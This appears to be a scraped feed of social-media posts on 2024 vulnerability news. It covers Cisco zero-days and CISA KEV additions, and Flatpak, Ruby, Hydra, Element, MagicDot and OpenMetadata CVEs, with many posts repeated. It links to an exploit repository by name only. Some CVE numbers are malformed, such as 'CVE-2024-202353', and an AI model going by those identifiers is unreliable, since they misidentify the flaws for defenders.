CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##While Cisco's Event Response lists CVE-2024-20358 as "leveraged in these attacks," its own security advisory states:
The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
🔗 CVE-2024-20358 (6.0 medium) Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
CISA's RSS feed showed that the security alert for the KEV additions created at 0800 ET, meaning it was coordinated and prepared in advance of Cisco's announcements. Because CISA only added the other two Cisco vulnerabilities, CVE-2024-20358 does not appear to be a known exploited vulnerability.
##2 posts
2 repos
https://github.com/StayBeautiful-collab/CVE-2023-3824-PHP-to-RCE-LockBit-LEAK
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Flatpak just received a new update 👀
New features:
Bug fixes:
Internal changes:
Found and patched!
CVE-2024-32462: Sandbox escape via RequestBackground portal and CWE-88 · Advisory · flatpak/flatpak
https://github.com/flatpak/flatpak/security/advisories/GHSA-phv6-cpc2-2fgj
###Flatpak Patch Addresses Major Sandbox Escape Flaw
Critical CVE-2024-32462 exposed in Flatpak, allowing unauthorized code execution. Update urgently to fixed versions 1.14.6 and above.
https://linuxiac.com/flatpak-patch-addresses-major-sandbox-escape-flaw/
##Flatpak just received a new update 👀
New features:
Bug fixes:
Internal changes:
Found and patched!
CVE-2024-32462: Sandbox escape via RequestBackground portal and CWE-88 · Advisory · flatpak/flatpak
https://github.com/flatpak/flatpak/security/advisories/GHSA-phv6-cpc2-2fgj
###Flatpak Patch Addresses Major Sandbox Escape Flaw
Critical CVE-2024-32462 exposed in Flatpak, allowing unauthorized code execution. Update urgently to fixed versions 1.14.6 and above.
https://linuxiac.com/flatpak-patch-addresses-major-sandbox-escape-flaw/
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart
HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog
See original toot above for information on the Cisco exploited zero-days.
#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog
##Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
> スクリプト言語「Ruby」の開発チームは4月23日、「Ruby」の正規表現(Regex)検索に任意のメモリアドレスを読み取られる脆弱性(CVE-2024-27282)があることを明らかにした。修正版がリリースされている。
「Ruby 3」系統の正規表現コンパイラーに情報漏えいの脆弱性、修正版がリリース
v3.0.7、v3.1.5、v3.2.4、v3.3.1への更新を
https://forest.watch.impress.co.jp/docs/news/1586881.html
Thank you to @havenwood for updating the ruby-versions repo for CVE-2024-27282! ruby-install users, please upgrade your ruby versions!
ruby-install --update
ruby-install ruby-3.0.7
ruby-install ruby-3.1.5
ruby-install ruby-3.2.4
ruby-install ruby-3.3.1
https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/
#ruby #rubysec #cve #cve_2024_2782 #cve20242782
Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.
https://github.com/NixOS/hydra/security/advisories/GHSA-2p75-6g9f-pqgx
Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...
##Discovered and (tentatively) fixed CVE-2024-32657 yesterday - somehow I think this might be my first CVE finder credit ever.
https://github.com/NixOS/hydra/security/advisories/GHSA-2p75-6g9f-pqgx
Very obvious hole, but hey, either nobody saw the exploitability or nobody cared to fix it before...
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##SafeBreach revealed that the DOS-to-NT path conversion process could be exploited by threat actors to achieve rootkit-like capabilities to conceal and impersonate files, directories, and processes. "During this conversion process, a known issue exists in which the function removes trailing dots (referring to this as "MagicDot") from any path element and any trailing spaces from the last path element. This action is completed by most user-space APIs in Windows." This resulted in multiple CVEs: CVE-2023-36396 (7.8 high, RCE), CVE-2023-32054 (7.3 high, EoP write), and CVE-2023-42757 (unpublished DoS). Microsoft declined to fix an Elevation of Privilege delete vulnerability. 🔗 https://www.safebreach.com/blog/magicdot-a-hackers-magic-show-of-disappearing-dots-and-spaces/
##Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers
A writeup about two intent-based Android vulnerabilities CVE-2024-26131 and CVE-2024-26132 in Element (Matrix).
🔗️ [Shielder] https://link.is.it/xwp7qw
##Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers
A writeup about two intent-based Android vulnerabilities CVE-2024-26131 and CVE-2024-26132 in Element (Matrix).
🔗️ [Shielder] https://link.is.it/xwp7qw
##Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC
##Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC
##Cisco released 3 security advisories:
Please note that a proof of concept was publicly disclosed for CVE-2024-20295 before it was patched, making this a zero-day. The Cisco PSIRT is not aware of any malicious use of the vulnerabilities that were described in these advisories. But don't take my word for it, go check them out yourself.
#Cisco #PatchTuesday #zeroday #proofofconcept #CVE_2024_20356 #CVE_2024_20373 #CVE_2024_20295
##